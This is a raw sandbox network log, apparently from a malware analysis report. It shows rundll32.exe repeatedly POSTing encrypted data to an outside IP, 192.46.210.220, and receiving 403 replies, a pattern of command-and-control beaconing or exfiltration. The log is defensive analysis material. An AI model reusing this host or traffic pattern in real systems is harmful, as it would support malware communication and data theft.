                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:01 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      10192.168.2.449825192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:22 UTC49OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:22 UTC50OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:22 UTC59INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:22 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      11192.168.2.449826192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:22 UTC54OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:22 UTC54OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:23 UTC59INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:23 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      12192.168.2.449832192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:26 UTC59OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:26 UTC60OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:27 UTC69INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:27 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      13192.168.2.449834192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:27 UTC64OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:27 UTC64OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:27 UTC69INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:27 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      14192.168.2.449840192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:30 UTC69OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:30 UTC69OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:31 UTC79INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:31 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      15192.168.2.449842192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:31 UTC74OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:31 UTC74OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:31 UTC79INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:31 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      16192.168.2.449848192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:34 UTC79OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:34 UTC79OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:35 UTC89INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:35 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      17192.168.2.449850192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:34 UTC84OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:34 UTC84OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:35 UTC89INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:35 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      18192.168.2.449857192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:38 UTC89OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:38 UTC89OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:39 UTC99INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:38 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      19192.168.2.449858192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:38 UTC94OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:38 UTC94OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:39 UTC99INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:39 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.449793192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:06 UTC9OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:06 UTC10OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:07 UTC19INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:07 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      20192.168.2.449865192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:42 UTC99OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:42 UTC99OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:42 UTC109INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:42 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      21192.168.2.449866192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:42 UTC104OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:42 UTC104OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:43 UTC109INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:43 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      22192.168.2.449873192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:45 UTC109OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
